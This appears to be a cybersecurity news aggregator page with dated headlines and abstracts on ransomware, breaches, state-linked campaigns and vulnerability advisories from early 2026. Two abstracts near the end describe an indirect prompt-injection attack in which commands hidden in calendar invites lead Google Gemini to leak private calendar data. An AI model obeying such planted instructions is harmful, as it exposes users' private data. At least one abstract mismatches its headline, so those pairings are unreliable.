Welcome to BSafes Library
BSafes library includes mobile-friendly cybersecurity publications.
News
February 26, 2026 – General
Darktrace Flags 32 Million Phishing Emails in 2025 as Identity Attacks Full Text
Abstract
The data was collected by Darktrace from incidents across its global customer base and points to a year defined by automation, convergence and accelerating attacker speed.Infosecurity Magazine
February 26, 2026 – APT
APT37 Adds New Tools For Air-Gapped Networks Full Text
Abstract
ThreatLabz details the Ruby Jumper campaign in the following sections, focusing on the specific malware employed, the deployment methods, and how the final payload is delivered to achieve the ultimate objective.ZScalar
February 24, 2026 – Attack
Japanese chip-testing toolmaker Advantest suffers ransomware attack Full Text
Abstract
Japanese tech testing company Advantest has suffered a ransomware attack, the company confirmed last Thursday, after detecting unusual activity within its IT environment on February 15, 2026.Help Net Security
February 24, 2026 – APT
APT28 Targeted European Entities Using Webhook-Based Macro Malware Full Text
Abstract
APT28, a Russia-linked state-sponsored threat actor, has been attributed to a campaign targeting selected entities across Western and Central Europe, active from September 2025 through January 2026, according to S2 Grupo’s LAB52 team.The Hacker News
February 24, 2026 – Malware
Malicious OpenClaw Skills Used to Distribute Atomic MacOS Stealer Full Text
Abstract
Atomic (AMOS) Stealer has evolved from being distributed via cracked software to a more sophisticated supply chain attack that manipulates AI agentic workflows on platforms like OpenClaw.Trend Micro
February 23, 2026 – Hacker
MuddyWater Targets MENA Organizations with GhostFetch, CHAR, and HTTP_VIP Full Text
Abstract
The Iranian hacking group known as MuddyWater has targeted several organizations and individuals mainly located across the Middle East and North Africa (MENA) region as part of a new campaign codenamed Operation Olalampo.The Hacker News
February 20, 2026 – Vulnerabilities
Critical Vulnerability in Welker OdorEyes EcoSystem Pulse Bypass System Full Text
Abstract
A critical vulnerability has been identified in the Welker OdorEyes EcoSystem Pulse Bypass System with XL4 Controller. This vulnerability, which lacks authentication for a critical function, could lead to over- or under-odorization events.CISA
February 20, 2026 – Attack
Industrial-Scale Fake Coretax Apps Drive $2m Fraud in Indonesia Full Text
Abstract
A fraud campaign exploiting Indonesia's Coretax tax platform has resulted in financial losses of $1.5m to $2m. The operation identified 228 new malware samples and 996 phishing URLs, targeting a potential pool of 67 million Indonesian taxpayers.Infosecurity Magazine
February 20, 2026 – Malware
Remcos RAT Expands Real-Time Surveillance Capabilities Full Text
Abstract
The Remcos RAT has evolved with new real-time surveillance capabilities and stronger evasion techniques. Originally a legitimate remote management tool, Remcos has been repurposed as a Remote Access Trojan.Infosecurity Magiazine
February 20, 2026 – Vulnerabilities
Critical Vulnerabilities in Jinan USR IOT Technology Limited (PUSR) USR-W610 Full Text
Abstract
Multiple critical vulnerabilities have been identified in the Jinan USR IOT Technology Limited (PUSR) USR-W610 device, potentially allowing unauthorized access and denial-of-service attacks.CISA
February 20, 2026 – Vulnerabilities
better-auth Flaw Allows Unauthenticated API Key Creation Full Text
Abstract
A critical vulnerability in the better-auth library allows unauthenticated attackers to create API keys for arbitrary users, posing a significant risk of account takeover and MFA bypass.ESecurity Planet
February 20, 2026 – Malware
Crims hit a $20M jackpot via malware-stuffed ATMs Full Text
Abstract
ATM jackpotting is a significant threat, with over $20 million stolen using malware-assisted techniques. The Ploutus malware exploits the XFS API, allowing attackers to dispense cash without bank authorization.The Register
February 20, 2026 – General
Researchers warn Volt Typhoon still embedded in US utilities and some breaches may never be found Full Text
Abstract
Volt Typhoon continues to target strategically important sites, maintaining long-term access to operational technology networks. This access could enable destructive cyberattacks aimed at slowing U.S. military mobilization.The Record
February 19, 2026 – Government
Known Exploited Vulnerabilities Catalog Full Text
Abstract
The vulnerability in TeamT5 ThreatSonar Anti-Ransomware allows remote attackers with administrator privileges to upload malicious files, potentially leading to arbitrary command execution on the server.CISA
February 19, 2026 – General
China-linked crew embedded in US energy networks Full Text
Abstract
The cybersecurity landscape is increasingly threatened by state-sponsored groups, particularly from China and Russia, targeting critical infrastructure in the US. Notably, the Volt Typhoon group has been embedding malware in US energy networks.The Register
February 18, 2026 – Phishing
Hackers Abuse ScreenConnect to Hijack PCs via Fake Social Security Emails Full Text
Abstract
Hackers are exploiting fake Social Security Administration (SSA) emails to hijack PCs by abusing the ScreenConnect tool. This attack does not rely on new viruses but rather on hijacking existing tools and weakening system defenses.Hack Read
February 18, 2026 – Botnet
Keenadu the tablet conqueror and the links between major Android botnets Full Text
Abstract
Keenadu is a sophisticated backdoor targeting Android devices by embedding itself into the firmware. It mirrors the behavior of the Triada backdoor, allowing attackers to control devices remotely and exfiltrate data.February 18, 2026 – Attack
SmartLoader Attack Uses Trojanized Oura MCP Server to Deploy StealC Infostealer Full Text
Abstract
The SmartLoader campaign involves a sophisticated attack using a trojanized Oura MCP server to deploy the StealC infostealer. Threat actors have invested months in building credibility by creating fake GitHub accounts and repositories.The Hacker News
February 18, 2026 – Hacker
Hackers target supporters of Iran protests in new espionage campaign Full Text
Abstract
A cyberespionage campaign targets supporters of Iran's anti-government protests, focusing on Farsi-speaking Iranians, activists, and journalists. The campaign exploits the ongoing internet blackout in Iran and is linked to Iranian-aligned hackers.The Record
February 12, 2026 – Government
CISA Releases Two Industrial Control Systems Advisories Full Text
Abstract
CISA has released two new ICS advisories on December 30, 2025. These advisories address vulnerabilities in WHILL C2 Wheelchairs and AzeoTech DAQFactory, providing critical information on current security issues and exploits.CISA
February 12, 2026 – Vulnerabilities
Apple fixes zero-day flaw used in ‘extremely sophisticated’ attacks Full Text
Abstract
Apple has addressed a zero-day vulnerability, CVE-2026-20700, in its Dynamic Link Editor (dyld), which was exploited in highly sophisticated attacks targeting specific individuals. This marks the first zero-day fix in 2026.Bleeping Computer
February 12, 2026 – Breach
Georgia healthcare company data breach impacts more than 620,000 Full Text
Abstract
A significant data breach at ApolloMD, a Georgia-based healthcare provider, occurred between May 22 and May 23, 2025, compromising the sensitive information of 626,540 individuals. The breach was executed by the Qilin ransomware gang.The Record
February 12, 2026 – Breach
Volvo Group hit in massive Conduent data breach Full Text
Abstract
A significant data breach at Conduent has impacted over 25 million individuals, including 17,000 employees of Volvo Group North America. The breach exposed sensitive personal data, making it one of the largest breaches in recent history.Security Affairs
February 12, 2026 – Attack
Crazy ransomware gang abuses employee monitoring tool in attacks Full Text
Abstract
The Crazy ransomware gang is exploiting legitimate employee monitoring software and the SimpleHelp remote support tool to maintain persistence in corporate networks, evade detection, and prepare for ransomware deployment.Bleeping Computer
February 12, 2026 – Malware
First Malicious Outlook Add-In Found Stealing 4,000+ Microsoft Credentials Full Text
Abstract
The "AgreeToSteal" attack marks the first known instance of a malicious Microsoft Outlook add-in in the wild, exploiting the abandoned "AgreeTo" add-in to steal over 4,000 Microsoft credentials.The Hacker News
February 11, 2026 – Phishing
Pride Month Phishing Targets Employees via Trusted Email Services Full Text
Abstract
The phishing campaign began in December 2025, initially targeting 504 organizations primarily in the financial services and consulting sectors as part of a testing phase.Hack Read
February 11, 2026 – Malware
ZeroDayRAT malware grants full access to Android, iOS devices Full Text
Abstract
ZeroDayRAT is a sophisticated mobile spyware platform targeting Android and iOS devices, offering cybercriminals full remote control. It poses significant risks to both individuals and enterprisesBleeping Computer
February 11, 2026 – Attack
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps Full Text
Abstract
A cyber incident in Poland's energy sector targeted OT and ICS systems, affecting renewable energy plants, a combined heat and power plant, and a manufacturing company. The attack exploited vulnerable edge devices.CISA
February 11, 2026 – Phishing
North Korean hackers targeted crypto exec with fake Zoom meeting, ClickFix scam Full Text
Abstract
North Korean hackers, identified as UNC1069, targeted a cryptocurrency executive using a fake Zoom meeting and ClickFix scam. The attack aimed to enable cryptocurrency theft and fuel future social engineering campaigns.The Record
February 9, 2026 – Breach
Birmingham mental health authority warns 30,000+ people of data breach that leaked SSNs and medical info Full Text
Abstract
The Jefferson Blount St. Claire Mental Health Authority in Birmingham, Alabama, experienced a significant data breach in November 2025, affecting over 30,000 individuals.CompariTech
February 9, 2026 – Breach
Flickr emails users about data breach, pins it on 3rd party Full Text
Abstract
Flickr, a legacy image-sharing platform, has experienced a data breach affecting its global user base. Operating in 190 countries, Flickr has 35 million active users monthly, including 228,000 in Europe.The Register
February 9, 2026 – Phishing
State-backed phishing attacks targeting military officials and journalists on Signal Full Text
Abstract
A state-backed hacking group is targeting military officials, journalists, and diplomats in Germany and Europe through phishing attacks on Signal. These attacks aim to gain unauthorized access to accounts by impersonating Signal support.Help Net Security
February 9, 2026 – Outage
Payments platform BridgePay confirms ransomware attack behind outage Full Text
Abstract
BridgePay, a major U.S. payment gateway, has confirmed a ransomware attack that has caused a significant outage across its services. Initial forensic findings indicate that no payment card data has been compromised.Bleeping Computer
February 9, 2026 – Botnet
UK Construction Firm Hit by Prometei Botnet Hiding in Windows Server Full Text
Abstract
The Prometei botnet, a Russian-linked threat active since 2016, has been identified in a UK construction firm's Windows Server. Known for mining Monero cryptocurrency, it also excels at stealing passwords and maintaining remote control over systems.Hack Read
February 6, 2026 – Vulnerabilities
Why a decade-old EnCase driver still works as an EDR killer Full Text
Abstract
Attackers are exploiting a decade-old EnCase driver to disable 59 endpoint security products. The driver's certificate, issued on December 15, 2006, allows it to load on modern Windows systems due to Microsoft's backward compatibility policies.Help Net Security
February 6, 2026 – Breach
Romanian oil pipeline operator Conpet discloses cyberattack Full Text
Abstract
The Qilin ransomware gang, known for targeting high-profile organizations, has claimed responsibility for the cyberattack on Conpet, alleging the theft of nearly 1TB of data, including sensitive documents and financial information.Bleeping Computer
February 6, 2026 – Vulnerabilities
Critical Vulnerabilities in Ilevia EVE X1 Server Allow Remote Exploitation Full Text
Abstract
The Ilevia EVE X1 Server has been found to contain multiple critical vulnerabilities that could allow attackers to execute arbitrary commands, disclose sensitive information, and escalate privileges.CISA
February 6, 2026 – Malware
Technical Analysis of Marco Stealer Full Text
Abstract
Marco Stealer is a sophisticated information stealer targeting browser data, cryptocurrency wallets, and sensitive files. It employs advanced anti-analysis techniques and uses AES-256 encryption for secure C2 communication.ZScalar
February 6, 2026 – Outage
Italian university La Sapienza goes offline after cyberattack Full Text
Abstract
La Sapienza University, Europe's largest by in-campus students, has been hit by a ransomware attack attributed to the pro-Russian group Femwar02. The attack has led to significant disruptions, with IT systems offline and data encrypted.Bleeping Computer
February 6, 2026 – Botnet
AISURU/Kimwolf Botnet Launches Record-Setting 31.4 Tbps DDoS Attack Full Text
Abstract
The AISURU/Kimwolf botnet has launched a record-setting DDoS attack, peaking at 31.4 Tbps. This attack is part of a significant increase in DDoS activity in 2025, with Cloudflare mitigating over 47.1 million attacks throughout the year.The Hacker News
February 6, 2026 – Government
CISA Adds Two Known Exploited Vulnerabilities to Catalog Full Text
Abstract
CISA has added two vulnerabilities, CVE-2025-11953 and CVE-2026-24423, to its Known Exploited Vulnerabilities (KEV) Catalog. These vulnerabilities are actively exploited and pose significant risks to federal enterprises.CISA
February 6, 2026 – Outage
Spain’s Ministry of Science shuts down systems after breach claims Full Text
Abstract
Spain's Ministry of Science has partially shut down its IT systems following claims of a cyberattack. The Ministry cited a "technical incident" without confirming the attack.Bleeping Computer
February 5, 2026 – Malware
Hugging Face abused to spread thousands of Android malware variants Full Text
Abstract
A recent Android malware campaign has been identified, exploiting the Hugging Face platform to distribute thousands of malicious APK variants. The malware, disguised as a security tool named TrustBastion.Bleeping Computer
February 5, 2026 – Breach
Notepad++ users take note: It’s time to check if you’re hacked Full Text
Abstract
A critical security breach has been identified in the update infrastructure of Notepad++, a widely used text editor for Windows. The breach, attributed to suspected Chinese state hackers.ArsTechnica
February 5, 2026 – Vulnerabilities
Major vulnerabilities found in Google Looker, putting self-hosted deployments at risk Full Text
Abstract
Two critical vulnerabilities, collectively known as "LookOut," have been identified in Google Looker, a business intelligence platform used by over 60,000 organizations globally.Help Net Security
February 5, 2026 – Breach
Exposed AWS Credentials Lead to AI-Assisted Cloud Breach in 8 Minutes Full Text
Abstract
A recent cloud breach highlights the dangers of exposed AWS credentials and AI-assisted attacks. An attacker gained full admin access to a company's cloud environment in just eight minutes.Hack Read
February 5, 2026 – Government
CISA warns of five-year-old GitLab flaw exploited in attacks Full Text
Abstract
CISA issued a warning regarding a five-year-old GitLab vulnerability that is actively being exploited. CISA has urged all organizations, including those in the private sector, to prioritize securing their devices against these ongoing attacks.Bleeping Computer
February 4, 2026 – Breach
Seattle-area neurologist warns 13,500 people of data breach that leaked SSNs, medical info Full Text
Abstract
A data breach has occurred at Neurological Associates of Washington, affecting 13,500 individuals. The breach involved the theft of sensitive information, including Social Security numbers and medical records, by the ransomware group DragonForce.CompariTech
February 4, 2026 – Government
U.S. CISA adds SolarWinds Web Help Desk, Sangoma FreePBX, and GitLab flaws to its Known Exploited Vulnerabilities catalog Full Text
Abstract
CISA has added several critical vulnerabilities to its Known Exploited Vulnerabilities catalog. These vulnerabilities affect SolarWinds Web Help Desk, Sangoma FreePBX, and GitLab, posing significant security risks to affected systems.Security Affairs
February 4, 2026 – Vulnerabilities
Foxit Releases Security Updates for PDF Editor Cloud XSS Vulnerabilities Full Text
Abstract
Foxit Software has addressed multiple cross-site scripting (XSS) vulnerabilities in Foxit PDF Editor Cloud and Foxit eSign. These vulnerabilities could allow attackers to execute arbitrary JavaScript within a user's browser.The Cyber Express
February 4, 2026 – Phishing
Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers Full Text
Abstract
Microsoft has identified a growing threat where Python-based infostealers are targeting macOS environments. These attacks exploit cross-platform capabilities and trusted platforms to distribute malware at scale.The Hacker News
February 4, 2026 – Phishing
How fake party invitations are being used to install remote access tools Full Text
Abstract
A sophisticated social engineering campaign is targeting Windows users in the UK by using fake party invitations to install ScreenConnect, a legitimate remote access tool, for malicious purposes.Malware Bytes
February 3, 2026 – APT
Russian hackers exploit recently patched Microsoft Office bug in attacks Full Text
Abstract
APT28 is actively exploiting a recently patched vulnerability in Microsoft Office, identified as CVE-2026-21509. This zero-day flaw is being used to target Ukrainian government entities and potentially extends to EU-based organizations.Bleeping Computer
February 3, 2026 – Breach
Portland, ME schools warn 12,000+ people of data breach that leaked SSNs, financial and medical info Full Text
Abstract
Portland Public Schools in Maine has confirmed a data breach affecting over 12,000 individuals, compromising sensitive personal information. The breach was claimed by the ransomware group RansomHub, known for targeting educational institutions.CompariTech
February 3, 2026 – Breach
Colorado clinic warns 65,000+ people of data breach that leaked SSNs, credit cards, and medical info Full Text
Abstract
A significant data breach at Alpine Ear, Nose & Throat has compromised the personal information of over 65,000 individuals. The breach, attributed to the ransomware group BianLian, involved the theft of sensitive data.CompariTech
February 3, 2026 – Attack
Notepad++ hijacking linked to Chinese Lotus Blossom crew Full Text
Abstract
A sophisticated malware campaign leveraging Pulsar RAT has been identified, targeting Windows systems. This campaign employs advanced techniques to evade detection and maintain persistent access, posing a significant threat to affected systems.The Register
February 3, 2026 – Breach
Panera Bread breach affected 5.1 Million accounts, HIBP Confirms Full Text
Abstract
Panera Bread has confirmed a data breach affecting 5.1 million accounts, significantly fewer than the initially reported 14 million. The breach involved the exposure of contact information, including email addresses and physical addresses.Security Affairs
February 2, 2026 – Breach
California tribal clinics warn patients of data breach that leaked SSNs and medical info Full Text
Abstract
A data breach has occurred at the MACT Health Board, affecting several clinics in California's Sierra Foothills. The breach, attributed to the ransomware group Rhysida, has compromised sensitive personal and medical information of patients.CompariTech
February 2, 2026 – Vulnerabilities
Shadow Directories: A Unique Method to Hijack WordPress Permalinks Full Text
Abstract
A new method of hijacking WordPress permalinks involves the creation of shadow directories. This technique allows attackers to inject spam content into search engine results without altering the visible content on the website or its database.Sucuri
February 2, 2026 – Vulnerabilities
Privileged File System Vulnerability Present in a SCADA System Full Text
Abstract
A vulnerability identified as CVE-2025-0921 has been discovered in the Iconics Suite, a SCADA system used for industrial process control. This vulnerability allows for execution with unnecessary privileges, potentially leading to a DoS condition.Palo Alto Network
February 2, 2026 – Attack
Iran-Linked RedKitten Cyber Campaign Targets Human Rights NGOs and Activists Full Text
Abstract
The RedKitten cyber campaign, attributed to a Farsi-speaking threat actor aligned with Iranian state interests, targets NGOs and individuals documenting human rights abuses in Iran.The Hacker News
February 2, 2026 – Breach
CrossCurve Bridge Hacked for $3M After Smart Contract Validation Vulnerability Exploited Full Text
Abstract
The CrossCurve bridge suffered a cyberattack resulting in a $3 million loss. Attackers exploited a vulnerability in the smart contract infrastructure, specifically a gateway validation bypass within the ReceiverAxelar contract.The Cyber Express
January 31, 2026 – Botnet
Aisuru botnet sets new record with 31.4 Tbps DDoS attack Full Text
Abstract
The Aisuru botnet has set a new record with a massive DDoS attack, peaking at 31.4 Tbps and 200 million requests per second. This unprecedented attack targeted multiple companies, primarily in the telecommunications sector.Bleeping Computer
January 31, 2026 – Attack
Supply chain attack on eScan antivirus: detecting and remediating malicious updates Full Text
Abstract
A supply chain attack targeted eScan antivirus software, distributing malware through its update server. The attack involved a malicious file that initiated a multi-stage infection chain.Secure List
January 31, 2026 – Breach
ShinyHunters claims it stole10M records from dating apps Full Text
Abstract
ShinyHunters, a notorious extortion group, has claimed responsibility for a data breach affecting Match Group, a company that owns popular dating platforms such as Hinge, Match.com, and OkCupid. The breach reportedly involves over 10 million records.The Register
January 31, 2026 – Breach
Researcher’s Notebook: Inside the EmEditor supply chain compromise Full Text
Abstract
The EmEditor supply chain compromise involved tampering with Windows Installer (MSI) packages to embed malicious scripts. The attackers used look-alike domains and command-and-control (C2) infrastructure to execute their operations.Reversing Labs
January 30, 2026 – Malware
Cyble Research Discovers ShadowHS, an In-Memory Linux Framework for Long-Term Access Full Text
Abstract
ShadowHS is an advanced fileless Linux exploitation framework designed for stealthy, in-memory operations. It enables attackers to maintain long-term access to compromised systems without leaving persistent traces.The Cyber Express
January 30, 2026 – Breach
Marquis blames ransomware breach on SonicWall cloud backup hack Full Text
Abstract
Marquis Software Solutions, a financial services provider, experienced a ransomware attack attributed to a breach of SonicWall's cloud backup service. This incident affected numerous U.S. banks and credit unions.Bleeping Computer
January 30, 2026 – Attack
Op Bizarre Bazaar: New LLMjacking Campaign Targets Unprotected Models Full Text
Abstract
Operation Bizarre Bazaar is a significant cyberattack campaign targeting AI systems to steal compute power and resell access. The campaign, led by a hacker known as Hecker, involves exploiting unprotected AI models, particularly those using MCP.Hack Read
January 30, 2026 – Vulnerabilities
Ivanti warns of two EPMM flaws exploited in zero-day attacks Full Text
Abstract
Ivanti has disclosed two critical zero-day vulnerabilities in Ivanti EPMM, identified as CVE-2026-1281 and CVE-2026-1340. These vulnerabilities allow remote attackers to execute arbitrary code on vulnerable devices without authentication.Bleeping Computer
January 30, 2026 – Vulnerabilities
Security Researcher Finds Exposed Admin Panel for AI Toy Full Text
Abstract
A critical security vulnerability was discovered in the Bondu AI toy, where an exposed admin panel allowed unauthorized access to sensitive data, including children's personal information and conversation transcripts.The Cyber Express
January 30, 2026 – Ransomware
MongoDB Ransomware Is Still Actively Hitting Exposed Databases Full Text
Abstract
MongoDB ransomware continues to be a significant threat, primarily targeting exposed databases due to misconfigurations. Attackers exploit these vulnerabilities by scanning for open MongoDB instances, deleting data, and demanding ransoms.ESecurity Planet
January 28, 2026 – Outage
Russian security systems firm Delta hit by cyberattack, services disrupted Full Text
Abstract
Delta, a prominent Russian provider of alarm and security systems, has experienced a significant cyberattack, leading to widespread service disruptions. The attack, described as large-scale and coordinated, has affected the company's operations.The Record
January 28, 2026 – Government
U.S. CISA adds Microsoft Office, GNU InetUtils, SmarterTools SmarterMail, and Linux Kernel flaws to its Known Exploited Vulnerabilities catalog Full Text
Abstract
CISA has added several critical vulnerabilities to its Known Exploited Vulnerabilities catalog. These vulnerabilities affect Microsoft Office, GNU InetUtils, SmarterTools SmarterMail, and the Linux Kernel.Security Affairs
January 28, 2026 – Vulnerabilities
Pyodide Sandbox Escape Enables Remote Code Execution in Grist-Core Full Text
Abstract
A critical vulnerability in Grist-Core's Pyodide WebAssembly sandbox allows remote code execution (RCE) through malicious spreadsheet formulas. This flaw, with a CVSS score of 9.1, has been patched.Infosesecurity Magazine
January 28, 2026 – Vulnerabilities
Critical sandbox escape flaw found in popular vm2 NodeJS library Full Text
Abstract
A critical vulnerability, CVE-2026-22709, has been identified in the vm2 Node.js sandbox library, which allows attackers to escape the sandbox and execute arbitrary code on the host system.Bleeping Computer
January 28, 2026 – Breach
Nike investigates data breach after extortion gang leaks files Full Text
Abstract
Nike is investigating a potential cybersecurity incident after World Leaks claimed to have stolen and leaked 1.4TB of corporate data, including nearly 190,000 files related to business operations.Bleeping Computer
January 28, 2026 – Attack
Experts Detect Pakistan-Linked Cyber Campaigns Aimed at Indian Government Entities Full Text
Abstract
Two cyber campaigns, Gopher Strike and Sheet Attack, have been identified targeting Indian government entities. These campaigns are linked to a Pakistan-based threat actor and employ sophisticated techniques to compromise systems and exfiltrate data.The Hacker News
January 28, 2026 – Criminals
Cybercriminals and nation-state groups are exploiting a six-month old WinRAR defect Full Text
Abstract
A critical path-traversal vulnerability in WinRAR is being actively exploited by nation-state groups. The vulnerability, disclosed and patched six months ago, continues to be a target for espionage and financially motivated attacks.Cyber Scoop
January 28, 2026 – Phishing
There’s a rash of scam spam coming from a real Microsoft address Full Text
Abstract
A recent phishing scam has been identified, exploiting a legitimate Microsoft email address to deliver scam emails. This advisory provides details on the scam's operation and its implications.Ars Technica
January 27, 2026 – Vulnerabilities
Emergency Microsoft update fixes in-the-wild Office zero-day Full Text
Abstract
Microsoft has released an emergency update to address a critical 0-day bug affecting Microsoft Office 2016–2024 and Microsoft 365 Apps. This bug is actively exploited in the wild and allows attackers to bypass security features.Security Affairs
January 27, 2026 – Breach
Cybercriminals say they sold data stolen from US medical manufacturer Full Text
Abstract
A significant data breach at Cytek Biosciences, a medical manufacturer based in Fremont, California, has been attributed to the ransomware group Rhysida. This breach has compromised sensitive personal and financial information of 331 individuals.CompariTech
January 26, 2026 – Breach
ShinyHunters Leak Alleged Data of Millions From SoundCloud, Crunchbase and Betterment Full Text
Abstract
The ShinyHunters hacking group has allegedly leaked millions of user records from SoundCloud, Crunchbase, and Betterment. This breach follows failed extortion attempts and raises concerns about potential links to an Okta vishing campaign.Hack Read
January 26, 2026 – Vulnerabilities
Critical VMware vCenter Server bug under attack Full Text
Abstract
A critical vulnerability, CVE-2024-37079, in VMware vCenter Server is being actively exploited. This vulnerability, an out-of-bounds write flaw in the DCERPC protocol, allows remote code execution.The Register
January 26, 2026 – Outage
Researchers say Russian government hackers were behind attempted Poland power outage Full Text
Abstract
A massive data breach has exposed 149 million credentials, including those from major platforms such as Facebook, Instagram, and government domains. This breach underscores the ongoing threat posed by infostealing malware.Tech Crunch
January 26, 2026 – Malware
Malicious AI extensions on VSCode Marketplace steal developer data Full Text
Abstract
Two malicious AI-based extensions on the VSCode Marketplace, installed 1.5 million times, exfiltrate developer data to China-based servers. These extensions are part of the 'MaliciousCorgi' campaign.Bleeping Computer
January 26, 2026 – Breach
Nike is investigating a possible data breach, after WorldLeaks claims Full Text
Abstract
Nike is currently investigating a potential data breach following claims by the WorldLeaks cybercrime group. The group alleges it has accessed and stolen 1.4TB of data from Nike's systems, raising concerns about consumer privacy and data security.Security Affairs
January 23, 2026 – Criminals
Crims hit the easy button for IT helpdesk scams Full Text
Abstract
The emergence of custom voice-phishing kits on dark web forums has significantly enhanced the ability of cybercriminals to conduct social engineering scams. These kits are being used to target Google, Microsoft, and Okta accounts.The Register
January 23, 2026 – Ransomware
INC ransomware opsec fail allowed data recovery for 12 US orgs Full Text
Abstract
An operational security failure by INC ransomware allowed researchers to recover data stolen from 12 US orgs. A forensic investigation that revealed the use of the Restic backup tool and exposed attacker infrastructure.Bleeping Computer
January 23, 2026 – Phishing
Phishing attacks abuse SharePoint, target energy orgs Full Text
Abstract
A sophisticated phishing campaign has been identified targeting energy-sector organizations. Attackers are exploiting Microsoft SharePoint services to harvest credentials and take over corporate email accounts, leading to widespread phishing attacks.The Register
January 23, 2026 – Government
CISA Adds Four Known Exploited Vulnerabilities to Catalog Full Text
Abstract
CISA has added four new vulnerabilities to its KEV Catalog. These vulnerabilities include improper access control, improper authentication, embedded malicious code, and remote file inclusion, affecting various software products.CISA
January 22, 2026 – Vulnerabilities
Fortinet admins report patched FortiGate firewalls getting hacked Full Text
Abstract
Fortinet's FortiGate firewalls are under attack due to a critical authentication bypass vulnerability that remains exploitable despite previous patch attempts. Attackers are leveraging this flaw to gain unauthorized access to systems.Bleeping Computer
January 22, 2026 – Breach
Hackers exploit security testing apps to breach Fortune 500 firms Full Text
Abstract
Threat actors are exploiting misconfigured web applications used for security training and internal penetration testing to breach cloud environments of Fortune 500 companies.Bleeping Computer
January 22, 2026 – Attack
PurpleBravo’s Targeting of the IT Software Supply Chain Full Text
Abstract
PurpleBravo, a North Korean state-sponsored threat group, poses a significant threat to the IT software supply chain. The group targets software developers, particularly in the cryptocurrency and software development sectors.Recorded Future
January 22, 2026 – Attack
Can you use too many LOLBins to drop some RATs? Full Text
Abstract
This advisory details a sophisticated attack leveraging Windows' built-in utilities, known as LOLBins (Living Off the Land Binaries), to deploy Remcos and NetSupport Manager, both of which are remote access tools often abused by cybercriminals.Malware Bytes
January 22, 2026 – Vulnerabilities
Cisco fixed actively exploited Unified Communications zero day Full Text
Abstract
Cisco has addressed a critical zero-day vulnerability, CVE-2026-20045, in its Unified Communications products. This flaw allows unauthenticated remote attackers to execute arbitrary commands on affected devices.Security Affairs
January 22, 2026 – Malware
New Android malware uses AI to click on hidden browser ads Full Text
Abstract
A new family of Android click-fraud trojans is leveraging TensorFlow machine learning models to interact with advertisement elements. This malware is distributed through Xiaomi's GetApps store and third-party APK sites.Bleeping Computer
January 21, 2026 – Vulnerabilities
Anthropic quietly fixed flaws in its Git MCP server Full Text
Abstract
Anthropic has addressed critical vulnerabilities in its Git MCP server that could allow remote code execution. These vulnerabilities, identified as CVE-2025-68145, CVE-2025-68143, and CVE-2025-68144, have been fixed in the latest update.The Register
January 21, 2026 – Vulnerabilities
AI framework flaws put enterprise clouds at risk of takeover Full Text
Abstract
Two critical vulnerabilities in the Chainlit AI framework, CVE-2026-22218 and CVE-2026-22219, pose significant risks to enterprise cloud environments. These vulnerabilities could lead to data leaks or full system takeovers.The Register
January 21, 2026 – Vulnerabilities
Vulnerabilities in Rockwell Automation Verve Asset Manager Allow Unauthorized Access to Sensitive Information Full Text
Abstract
Rockwell Automation's Verve Asset Manager has been found to have vulnerabilities that could allow attackers to access sensitive information. These bugs, identified as CVE-2025-14376 and CVE-2025-14377, affect multiple versions of the product.CISA
January 21, 2026 – Attack
Inside a Multi-Stage Windows Malware Campaign Full Text
Abstract
A sophisticated multi-stage malware campaign is targeting Microsoft Windows users, primarily in Russia. The attack leverages social engineering, security control bypass, and ransomware deployment.Fortinet
January 21, 2026 – Phishing
Hackers target Afghan government workers with fake correspondence from senior officials Full Text
Abstract
A phishing campaign has been identified targeting Afghan government employees with emails disguised as official correspondence from the office of the prime minister. The campaign uses a decoy document to deliver malware named FalseCub.The Record
January 21, 2026 – Breach
Everest Ransomware Claims McDonalds India Breach Involving Customer Data Full Text
Abstract
The Everest ransomware group has claimed responsibility for a significant data breach involving McDonald's India. The group alleges to have exfiltrated 861 GB of sensitive data, including customer information and internal company documents.Hack Read
January 20, 2026 – General
Cyber Breaches, Compliance and Reputation Top UK Corporate Concerns Full Text
Abstract
Over half (58%) ranked cyber-related breaches as their top risk, with three-quarters doubting their ability to manage them. Their concern is grounded in experience and 20% said they had suffered a breach over the past two years.Infosecurity Magazine
January 20, 2026 – Vulnerabilities
Google Gemini Prompt Injection Flaw Exposed Private Calendar Data via Malicious Invites Full Text
Abstract
Cybersecurity researchers have disclosed details of a security flaw that leverages indirect prompt injection targeting Google Gemini as a way to bypass authorization guardrails and use Google Calendar as a data extraction mechanism.The Hacker News
January 20, 2026 – Criminals
Tudou Guarantee Marketplace Halts Telegram Transactions After Processing Over $12 Billion Full Text
Abstract
A Telegram-based guarantee marketplace known for advertising a broad range of illicit services appears to be winding down its operations. The closure of Tudou is a significant blow to the Southeast Asian scam economy.The Hacker News
January 20, 2026 – Vulnerabilities
New StackWarp Hardware Flaw Breaks AMD SEV-SNP Protections on Zen 1–5 CPUs Full Text
Abstract
A new hardware vulnerability, named StackWarp, has been identified in AMD processors, specifically affecting Zen 1 through Zen 5 models. This flaw allows attackers with privileged control over host servers to execute malicious code within CVMs.The Hacker News
January 20, 2026 – Malware
Fake ad blocker extension crashes the browser for ClickFix attacks Full Text
Abstract
A malicious ad-blocker extension called NexShield has been discovered, targeting Chrome and Edge users through a malvertising campaign. This extension creates a DoS condition by generating infinite connections, leading to browser crashes.Bleeping Computer
January 20, 2026 – Malware
PDFSIDER Malware - Exploitation of DLL Side-Loading for AV and EDR Evasion Full Text
Abstract
A new strain of malware known as PDFSider has been deployed in ransomware attacks against a Fortune 100 company in the finance sector. Attackers utilized social engineering tactics.ReSecurity
January 20, 2026 – Government
UK govt. warns about ongoing Russian hacktivist group attacks Full Text
Abstract
The UK government has issued a warning about ongoing DDoS attacks by the Russian-aligned hacktivist group NoName057(16), targeting critical infrastructure and local government organizations.Bleeping Computer
January 19, 2026 – Vulnerabilities
Google Gemini AI Tricked Into Leaking Calendar Data via Meeting Invites – Hackread – Cybersecurity News, Data Breaches, AI, and More Full Text
Abstract
A vulnerability in Google Gemini AI allows attackers to exploit calendar invites to extract private data. This attack uses Indirect Prompt Injection, embedding commands in meeting invites that instruct Gemini to leak information.Hack Read
January 19, 2026 – Breach
Ingram Micro admits ransomware raid exposed staff records Full Text
Abstract
Ingram Micro experienced a significant ransomware attack in July 2025, compromising the personal data of over 42,000 employees. The attack, claimed by the ransomware group SafePay, resulted in substantial operational disruptions and data exposure.The Register
January 19, 2026 – Attack
From Extension to Infection: An In-Depth Analysis of the Evelyn Stealer Campaign Targeting Software Developers Full Text
Abstract
